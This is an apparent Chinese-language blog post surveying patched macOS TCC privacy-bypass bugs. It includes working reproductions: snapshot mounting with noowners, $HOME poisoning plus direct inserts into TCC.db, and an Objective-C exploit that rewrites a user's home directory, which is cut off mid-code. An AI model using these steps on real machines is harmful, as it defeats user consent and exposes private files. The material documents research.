<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"buffer0verflooow.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.21.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="前言看了微软的这篇文章https:&#x2F;&#x2F;www.microsoft.com&#x2F;security&#x2F;blog&#x2F;2022&#x2F;01&#x2F;10&#x2F;new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access&#x2F;，觉得可以稍微整理一下相关的漏洞，用来后面构成exploit-chain。 背景知识TCC 维护包含应用请求同意历史记录的">
<meta property="og:type" content="article">
<meta property="og:title" content="macOS的一些TCC绕过漏洞">
<meta property="og:url" content="https://buffer0verflooow.github.io/2022/01/11/macOS%E7%9A%84%E4%B8%80%E4%BA%9BTCC%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="buffer0verflooow - Blog">
<meta property="og:description" content="前言看了微软的这篇文章https:&#x2F;&#x2F;www.microsoft.com&#x2F;security&#x2F;blog&#x2F;2022&#x2F;01&#x2F;10&#x2F;new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access&#x2F;，觉得可以稍微整理一下相关的漏洞，用来后面构成exploit-chain。 背景知识TCC 维护包含应用请求同意历史记录的">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://miro.medium.com/max/1400/1*JGU3QPAGrWK5e9x8VMcNOQ.png">
<meta property="og:image" content="https://miro.medium.com/max/3250/1*0Ke_UBzCwB4Uj9WaFVa0eQ.png">
<meta property="og:image" content="https://img2.helpnetsecurity.com/posts2021/Jamf-xcsset-screenshot-taking.jpg">
<meta property="og:image" content="https://www.microsoft.com/security/blog/uploads/securityprod/2022/01/Fig5-macOS-TCC-tccd-fix.png">
<meta property="article:published_time" content="2022-01-11T13:20:38.000Z">
<meta property="article:modified_time" content="2022-03-18T13:11:53.944Z">
<meta property="article:author" content="buffer0verflooow">
<meta property="article:tag" content="macos">
<meta property="article:tag" content="tcc">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://miro.medium.com/max/1400/1*JGU3QPAGrWK5e9x8VMcNOQ.png">


<link rel="canonical" href="https://buffer0verflooow.github.io/2022/01/11/macOS%E7%9A%84%E4%B8%80%E4%BA%9BTCC%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://buffer0verflooow.github.io/2022/01/11/macOS%E7%9A%84%E4%B8%80%E4%BA%9BTCC%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E/","path":"2022/01/11/macOS的一些TCC绕过漏洞/","title":"macOS的一些TCC绕过漏洞"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>macOS的一些TCC绕过漏洞 | buffer0verflooow - Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">buffer0verflooow - Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/home/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%83%8C%E6%99%AF%E7%9F%A5%E8%AF%86"><span class="nav-number">2.</span> <span class="nav-text">背景知识</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E"><span class="nav-number">3.</span> <span class="nav-text">漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Time-Machine-%E6%8C%82%E8%BD%BD-CVE-2020-9771"><span class="nav-number">3.1.</span> <span class="nav-text">Time Machine 挂载(CVE-2020-9771)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%8D%E7%8E%B0"><span class="nav-number">3.1.1.</span> <span class="nav-text">复现</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E4%B8%AD%E6%AF%92-CVE-2020-9934"><span class="nav-number">3.2.</span> <span class="nav-text">环境变量中毒(CVE-2020-9934)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%8D%E7%8E%B0-1"><span class="nav-number">3.2.1.</span> <span class="nav-text">复现</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9%E7%94%A8%E6%88%B7%E4%B8%BB%E7%9B%AE%E5%BD%95-CVE-2020-27937"><span class="nav-number">3.3.</span> <span class="nav-text">修改用户主目录(CVE-2020-27937)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%8D%E7%8E%B0-2"><span class="nav-number">3.3.1.</span> <span class="nav-text">复现</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Bundle-%E7%BB%93%E8%AE%BA%E9%97%AE%E9%A2%98-CVE-2021-30713"><span class="nav-number">3.4.</span> <span class="nav-text">Bundle 结论问题(CVE-2021-30713)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E2%80%9Cpowerdir%E2%80%9D%E6%BC%8F%E6%B4%9E"><span class="nav-number">3.5.</span> <span class="nav-text">“powerdir”漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%8D%E7%8E%B0-3"><span class="nav-number">3.5.1.</span> <span class="nav-text">复现</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%8A%80%E6%9C%AF"><span class="nav-number">4.</span> <span class="nav-text">绕过技术</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#iTerm2"><span class="nav-number">4.1.</span> <span class="nav-text">iTerm2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%8D%E7%8E%B0-4"><span class="nav-number">4.1.1.</span> <span class="nav-text">复现</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">buffer0verflooow</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">56</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">51</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://buffer0verflooow.github.io/2022/01/11/macOS%E7%9A%84%E4%B8%80%E4%BA%9BTCC%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="buffer0verflooow">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="buffer0verflooow - Blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="macOS的一些TCC绕过漏洞 | buffer0verflooow - Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          macOS的一些TCC绕过漏洞
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2022-01-11 21:20:38" itemprop="dateCreated datePublished" datetime="2022-01-11T21:20:38+08:00">2022-01-11</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2022-03-18 21:11:53" itemprop="dateModified" datetime="2022-03-18T21:11:53+08:00">2022-03-18</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>看了微软的这篇文章<a target="_blank" rel="noopener" href="https://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/%EF%BC%8C%E8%A7%89%E5%BE%97%E5%8F%AF%E4%BB%A5%E7%A8%8D%E5%BE%AE%E6%95%B4%E7%90%86%E4%B8%80%E4%B8%8B%E7%9B%B8%E5%85%B3%E7%9A%84%E6%BC%8F%E6%B4%9E%EF%BC%8C%E7%94%A8%E6%9D%A5%E5%90%8E%E9%9D%A2%E6%9E%84%E6%88%90exploit-chain%E3%80%82">https://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/，觉得可以稍微整理一下相关的漏洞，用来后面构成exploit-chain。</a></p>
<h1 id="背景知识"><a href="#背景知识" class="headerlink" title="背景知识"></a>背景知识</h1><p>TCC 维护包含应用请求同意历史记录的数据库。通常，当应用程序请求访问受保护的用户数据时，可能会发生以下两种情况之一：</p>
<ol>
<li>如果应用程序和请求类型在 TCC 数据库中有记录，则数据库条目中的标志指示是否允许或拒绝请求而无需自动且无需任何用户交互。</li>
<li>如果应用程序和请求类型在 TCC 数据库中没有记录，则会向用户显示提示，由用户决定是授予还是拒绝访问。所述决定被备份到数据库中，因此随后的类似请求现在将属于第一种情况。</li>
</ol>
<p>有两种 TCC 数据库。每种类型只维护请求类型的一个子集：</p>
<ul>
<li><strong>用户特定数据库：</strong>包含仅适用于特定用户配置文件的存储权限类型；它保存在<code>~/Library/Application Support/com.apple.TCC/TCC.db</code> 下，拥有该配置文件的用户可以访问</li>
<li><strong>系统范围的数据库：</strong>包含适用于系统级别的存储权限类型；它保存在<code>/Library/Application Support/com.apple.TCC/TCC.db</code> 下，可以由具有 root 或全盘访问权限的用户访问</li>
</ul>
<p>macOS 通过使用一个名为<em>tccd</em>的特殊守护进程来实现 TCC 逻辑。实际上，至少有两个 tccd 实例：一个由用户运行，另一个由 root 运行。</p>
<p>查看TCC的数据库文件，可以看到一个csreq的字段，该字段可以手动生成：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">mob@vul ~ codesign -d -r- /Applications/Visual\ Studio\ Code.app</span><br><span class="line">Executable=/Applications/Visual Studio Code.app/Contents/MacOS/Electron</span><br><span class="line">designated =&gt; identifier <span class="string">&quot;com.microsoft.VSCode&quot;</span> and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9</span><br><span class="line"> mob@vul ~ <span class="built_in">echo</span> <span class="string">&#x27;identifier &quot;com.microsoft.VSCode&quot; and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9&#x27;</span> | csreq -r- -b /tmp/csreq.bin</span><br><span class="line"> mob@vul ~ xxd -p /tmp/csreq.bin</span><br><span class="line">fade0c00000000a000000001000000060000000600000006000000060000</span><br><span class="line">000200000014636f6d2e6d6963726f736f66742e5653436f64650000000f</span><br><span class="line">0000000e000000010000000a2a864886f763640602060000000000000000</span><br><span class="line">000e000000000000000a2a864886f7636406010d0000000000000000000b</span><br><span class="line">000000000000000a7375626a6563742e4f550000000000010000000a5542</span><br><span class="line">46385433343647390000</span><br></pre></td></tr></table></figure>

<p>修改TCC数据库问价需要如果授予用户完整的磁盘访问权限。</p>
<h1 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h1><h2 id="Time-Machine-挂载-CVE-2020-9771"><a href="#Time-Machine-挂载-CVE-2020-9771" class="headerlink" title="Time Machine 挂载(CVE-2020-9771)"></a>Time Machine 挂载(CVE-2020-9771)</h2><p>macOS 提供了一个名为Time Machine的内置备份和恢复解决方案。发现可以使用“ <em>noowners</em> ”标志安装 Time Machine 备份（使用<em>apfs_mount</em>实用程序）。由于这些备份包含<em>TCC.db</em>文件，攻击者可以挂载这些备份并确定设备的 TCC 策略，而无需完全访问磁盘。</p>
<p>已在 5 月 26 日的 macOS Catalina 10.15.4 和 Mojave 中得到修复。</p>
<p>这个错误有两个独立的问题，这些问题的结合成为了一个非常强大的系统范围的访问。</p>
<ol>
<li>TCC 隐私不会在挂载的本地快照上强制执行，允许有人挂载它并访问其中的任何文件，包括那些通常受隐私保护的文件</li>
<li>所有用户都可以启动 APFS 快照，即使是低权限用户，也可以列出这些用户。除此之外，所有用户都可以挂载本地 APFS 快照，即使是低权限的快照，如果与<code>noowners</code>标志一起使用，低权限用户可以通过本地快照访问所有数据，包括所有其他用户的数据（甚至是高权限用户的数据）。</li>
</ol>
<p>noowners标志的意思是：忽略整个卷的所有权字段。这会导致所有对象显示为用户 ID 99 和组 ID 99 拥有。用户 ID 99 被解释为当前有效的用户 ID，而组 ID 99 直接使用并转换为“unknown”。</p>
<h3 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h3><p>先创建一个本地快照</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tmutil localsnapshot</span><br></pre></td></tr></table></figure>

<p>再列举已创建的快照</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">tmutil listlocalsnapshots /</span><br><span class="line"><span class="comment"># 输出</span></span><br><span class="line"><span class="comment"># Snapshots for volume group containing disk /:</span></span><br><span class="line"><span class="comment"># com.apple.TimeMachine.2019-11-17-133110.local</span></span><br><span class="line"><span class="comment"># com.apple.TimeMachine.2019-11-17-133316.local</span></span><br><span class="line"><span class="comment"># com.apple.TimeMachine.2019-11-17-141812.local</span></span><br></pre></td></tr></table></figure>

<p>使用noowners挂载快照</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mount_apfs -o noowners -s com.apple.TimeMachine.2019-11-17-141812.<span class="built_in">local</span> /System/Volumes/Data /tmp/snap</span><br></pre></td></tr></table></figure>

<p>然后就可以进快照，查看想看的文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /tmp/snap/Users/*</span><br></pre></td></tr></table></figure>

<p>最后，还有一点限制就是FileVault，如果开启了FileVault，则数据会被加密，作为guest的用户就看不到了。所以如果没有开启，则可以通过guest账户进行越权读取了。</p>
<h2 id="环境变量中毒-CVE-2020-9934"><a href="#环境变量中毒-CVE-2020-9934" class="headerlink" title="环境变量中毒(CVE-2020-9934)"></a>环境变量中毒(CVE-2020-9934)</h2><p>发现用户的<em>tccd</em>可以通过扩展*$HOME&#x2F;Library&#x2F;Application Support&#x2F;com.apple.TCC&#x2F;TCC.db<em>来构建</em>TCC.db<em>文件的路径。由于用户可以操纵</em>$HOME<em>环境变量（由</em>launchd<em>引入</em>tccd<em>），攻击者可以将选定的</em>TCC.db<em>文件</em>植入<em>任意路径，毒化</em>$HOME<em>环境变量，并让</em>TCC.db*使用该文件。</p>
<p>已在iOS 13.6、iPadOS 13.6和macOS Catalina 10.15.6上进行了修复。</p>
<p>能够直接写入数据库完全违背了 TCC 的目的，因此 Apple 使用 TCC 和系统完整性保护 (SIP) 来保护这个数据库本身。即使以 root 身份运行的程序也无法修改此数据库，除非它具有<code>com.apple.private.tcc.manager</code>和<code>com.apple.rootless.storage.TCC</code>权限。但是，从技术上讲，数据库仍然由当前运行的用户拥有和读写，所以只要我们能找到具有这些权限的程序，我们就可以控制数据库。</p>
<p>由于 TCC 守护进程直接负责读取和写入 TCC 数据库，所以这个漏洞就是针对 TCC 守护进程进行的。</p>
<p><img src="https://miro.medium.com/max/1400/1*JGU3QPAGrWK5e9x8VMcNOQ.png"></p>
<p><img src="https://miro.medium.com/max/3250/1*0Ke_UBzCwB4Uj9WaFVa0eQ.png"></p>
<p>当 TCC 守护进程尝试打开数据库时，程序会尝试<code>$HOME/Library/Application Support/com.apple.TCC/TCC.db</code>，所以利用的关键就是控制$HOME变量。</p>
<p>由于TCC守护进程是由launchd启动的，因此，可以将launchctl的$HOME变量指向我们控制的目录，重新启动 TCC 守护程序，然后直接修改 TCC 数据库，为自己提供所有可用的 TCC 权利，而无需提示最终用户。</p>
<h3 id="复现-1"><a href="#复现-1" class="headerlink" title="复现"></a>复现</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 重置数据库</span></span><br><span class="line">$&gt; tccutil reset All</span><br><span class="line"><span class="comment"># 从 ~/Library 模仿 TCC 的目录结构</span></span><br><span class="line">$&gt; <span class="built_in">mkdir</span> -p <span class="string">&quot;/tmp/tccbypass/Library/Application Support/com.apple.TCC&quot;</span></span><br><span class="line"><span class="comment"># cd 进入新目录</span></span><br><span class="line">$&gt; <span class="built_in">cd</span> <span class="string">&quot;/tmp/tccbypass/Library/Application Support/com.apple.TCC/&quot;</span>                     </span><br><span class="line"><span class="comment"># 设置 launchd $HOME 到这个临时目录</span></span><br><span class="line">$&gt; launchctl setenv HOME /tmp/tccbypass</span><br><span class="line"><span class="comment"># 重启 TCC 守护进程</span></span><br><span class="line">$&gt; launchctl stop com.apple.tccd &amp;&amp; launchctl start com.apple.tccd</span><br><span class="line"><span class="comment"># 打印出 TCC 数据库的内容，然后让终端访问 Documents </span></span><br><span class="line">$&gt; sqlite3 TCC.db .dump                                                                </span><br><span class="line">$&gt; sqlite3 TCC.db <span class="string">&quot;INSERT INTO access</span></span><br><span class="line"><span class="string">                   VALUES(&#x27;kTCCServiceSystemPolicyDocumentsFolder&#x27;,</span></span><br><span class="line"><span class="string">                   &#x27;com.apple.Terminal&#x27;, 0, 1, 1,</span></span><br><span class="line"><span class="string">X&#x27;fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003&#x27;,</span></span><br><span class="line"><span class="string">                   NULL,</span></span><br><span class="line"><span class="string">                   NULL,</span></span><br><span class="line"><span class="string">                   &#x27;UNUSED&#x27;,</span></span><br><span class="line"><span class="string">                   NULL,</span></span><br><span class="line"><span class="string">                   NULL,</span></span><br><span class="line"><span class="string">                   1333333333333337);&quot;</span></span><br><span class="line"><span class="comment"># 列出 Documents 目录而不提示最终用户</span></span><br><span class="line">$&gt; <span class="built_in">ls</span> ~/Documents</span><br></pre></td></tr></table></figure>

<p>Desktop等目录确实是不提示，但是，其他的就不行了，屏幕和完全文件访问权限，暂时不知道为什么。</p>
<h2 id="修改用户主目录-CVE-2020-27937"><a href="#修改用户主目录-CVE-2020-27937" class="headerlink" title="修改用户主目录(CVE-2020-27937)"></a>修改用户主目录(CVE-2020-27937)</h2><p>已在macOS Big Sur 11.2上进行修复</p>
<h3 id="复现-2"><a href="#复现-2" class="headerlink" title="复现"></a>复现</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line">// compile cmd: clang -framework Foundation -framework OpenDirectory tccbypass.m -o tccbypass</span><br><span class="line">#import &lt;Foundation/Foundation.h&gt;</span><br><span class="line">#import &lt;OpenDirectory/OpenDirectory.h&gt;</span><br><span class="line"></span><br><span class="line">#define NEW_HOME_DIRECTORY @&quot;/tmp/tccbypass&quot;</span><br><span class="line">#define USER_UID @&quot;501&quot;</span><br><span class="line"></span><br><span class="line">ODRecord* getUsersRecord() &#123;</span><br><span class="line">    </span><br><span class="line">    NSError *err = nil;</span><br><span class="line">    ODSession *session = [ODSession defaultSession];</span><br><span class="line">    ODNode *node = [ODNode nodeWithSession:session type:kODNodeTypeLocalNodes error:&amp;err];</span><br><span class="line">    </span><br><span class="line">    if(err != nil) &#123;</span><br><span class="line">        NSLog(@&quot;%@&quot;, [err localizedDescription]);</span><br><span class="line">        exit(0);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    ODQuery *getNFSHomeDirectory = [ODQuery queryWithNode:node</span><br><span class="line">                                           forRecordTypes:kODRecordTypeUsers</span><br><span class="line">                                                attribute:kODAttributeTypeUniqueID</span><br><span class="line">                                                matchType:kODMatchEqualTo</span><br><span class="line">                                              queryValues:USER_UID</span><br><span class="line">                                         returnAttributes:kODAttributeTypeStandardOnly</span><br><span class="line">                                           maximumResults:1</span><br><span class="line">                                                    error:&amp;err];</span><br><span class="line">    if(err != nil) &#123;</span><br><span class="line">        NSLog(@&quot;%@&quot;, [err localizedDescription]);</span><br><span class="line">        exit(0);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    NSArray *foundRecords = [getNFSHomeDirectory resultsAllowingPartial:NO error:&amp;err];</span><br><span class="line">    return foundRecords.firstObject;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">NSString* getUsersNFSHomeDirectory(ODRecord *userRecord) &#123;</span><br><span class="line">    NSError *err = nil;</span><br><span class="line">    NSString *nfsHomeDirectory = [userRecord valuesForAttribute:kODAttributeTypeNFSHomeDirectory error:&amp;err].firstObject;</span><br><span class="line">    if(err != nil) &#123;</span><br><span class="line">        NSLog(@&quot;%@&quot;, [err localizedDescription]);</span><br><span class="line">        exit(0);</span><br><span class="line">    &#125;</span><br><span class="line">    return nfsHomeDirectory;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">BOOL changeUsersNFSHomeDirectory(ODRecord *userRecord) &#123;</span><br><span class="line">    NSError *err = nil;</span><br><span class="line">    BOOL result = [userRecord setValue:NEW_HOME_DIRECTORY forAttribute:kODAttributeTypeNFSHomeDirectory error:&amp;err];</span><br><span class="line">    if(err != nil) &#123;</span><br><span class="line">        NSLog(@&quot;%@&quot;, [err localizedDescription]);</span><br><span class="line">        exit(0);</span><br><span class="line">    &#125;</span><br><span class="line">    return result;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">__attribute__((constructor)) static void pwn() &#123;</span><br><span class="line">    </span><br><span class="line">    NSLog(@&quot;Injected...&quot;);</span><br><span class="line">    </span><br><span class="line">    ODRecord *userRecord = getUsersRecord();</span><br><span class="line">    NSString *homeDirectory = [userRecord recordName];</span><br><span class="line">    NSLog(@&quot;Got OD node of user: %@&quot;, homeDirectory);</span><br><span class="line">    </span><br><span class="line">    NSString *nfsHomeDirectory = getUsersNFSHomeDirectory(userRecord);</span><br><span class="line">    NSLog(@&quot;User&#x27;s NFSHomeDirectory: %@&quot;, nfsHomeDirectory);</span><br><span class="line">    </span><br><span class="line">    BOOL result = changeUsersNFSHomeDirectory(userRecord);</span><br><span class="line">    </span><br><span class="line">    if(result == YES) &#123;</span><br><span class="line">        NSLog(@&quot;Successfully changed user&#x27;s NFSHomeDirectory&quot;);</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        NSLog(@&quot;Exploit was unable to change user&#x27;s NFSHomeDirectory&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    nfsHomeDirectory = getUsersNFSHomeDirectory(userRecord);</span><br><span class="line">    NSLog(@&quot;User&#x27;s NFSHomeDirectory: %@&quot;, nfsHomeDirectory);</span><br><span class="line">    </span><br><span class="line">    exit(0);</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main(int argc, char* 